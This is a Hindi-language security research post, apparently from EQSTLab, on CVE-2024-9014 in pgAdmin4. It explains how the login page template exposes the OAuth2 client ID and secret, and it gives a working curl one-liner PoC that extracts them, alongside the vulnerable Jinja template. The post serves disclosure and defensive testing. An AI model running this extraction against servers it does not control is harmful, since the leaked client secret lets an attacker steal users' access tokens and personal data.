
Pgadmin4 संवेदनशील जानकारी का प्रकटीकरण
यह पोस्ट EQSTLab द्वारा प्रकाशित एक शोध लेख है।
★ CVE-2024-9014 संवेदनशील जानकारी के खुलासे का PoC ★
CVE-2024-9014 : pgAdmin4 संवेदनशील जानकारी का खुलासा
विवरण: pgAdmin संस्करण 8.11 और इससे पहले के संस्करण OAuth2 प्रमाणीकरण में एक सुरक्षा दोष के प्रति संवेदनशील हैं। यह कमजोरी एक हमलावर को क्लाइंट आईडी और सीक्रेट प्राप्त करने की संभावना देती है, जिससे उपयोगकर्ता डेटा तक अनधिकृत पहुंच हो सकती है।
curl [URL_TO_TEST]/login?next=/ | grep -o '"oauth2Config": \[.*\]' | sed 's/"oauth2Config": //'
curl http://localhost:8000/login?next=/ | grep -o '"oauth2Config": \[.*\]' | sed 's/"oauth2Config": //'
pgadmin4-8.9 और pgadmin4-8.12

इस बिंदु पर, config.OAUTH2_CONFIG वेरिएबल OAUTH2 कॉन्फ़िगरेशन फ़ाइलें लौटाता है जिनमें OAUTH2_CLIENT_ID और OAUTH2_CLIENT_SECRET शामिल हैं।
{% set page_name = 'login_user' %}
{% set user_language = request.cookies.get('PGADMIN_LANGUAGE') or 'en' %}
{% set ns = namespace(langOptions=[]) %}
{% for key, lang in config.LANGUAGES.items() %}
{% set _ = ns.langOptions.append({'value': key, 'label': lang}) %}
{% endfor %}
{% set page_props = {
'userLanguage': user_language,
'langOptions': ns.langOptions,
'forgotPassUrl': url_for('browser.forgot_password'),
'loginUrl': url_for('authenticate.login'),
'csrfToken': csrf_token(),
'authSources': config.AUTHENTICATION_SOURCES,
'authSourcesEnum': {
'OAUTH2': config.OAUTH2,
'KERBEROS': config.KERBEROS,
},
'oauth2Config': config.OAUTH2_CONFIG,
'loginBanner': config.LOGIN_BANNER|safe
} %}
{% extends "security/render_page.html" %}

गुप्त OAuth पैरामीटर की पहचान करना और उनकी सुरक्षा करना बहुत महत्वपूर्ण है। जबकि “client_id” को सुरक्षित रूप से प्रकट किया जा सकता है, “client_secret” को प्रकट करना महत्वपूर्ण जोखिम वहन करता है। यदि client_secret से समझौता हो जाता है, तो एक हमलावर एप्लिकेशन की पहचान और विश्वास का दोहन करके उपयोगकर्ता के “access token” और व्यक्तिगत जानकारी को चुरा सकता है।
यह रिपॉजिटरी CVE-2024-9014 में संवेदनशील जानकारी को उजागर करने के लिए नहीं है। इस परियोजना का उद्देश्य लोगों को इस कमजोरी के बारे में सीखने और संभवतः अपने स्वयं के एप्लिकेशन का परीक्षण करने में मदद करना है।
हम महीने में एक बार CVE और मैलवेयर विश्लेषण प्रकाशित करते हैं। यदि आप रुचि रखते हैं, तो कृपया हमारे प्रकाशनों को देखने के लिए नीचे दिए गए लिंक का अनुसरण करें। https://www.skshieldus.com/eng/business/insight.do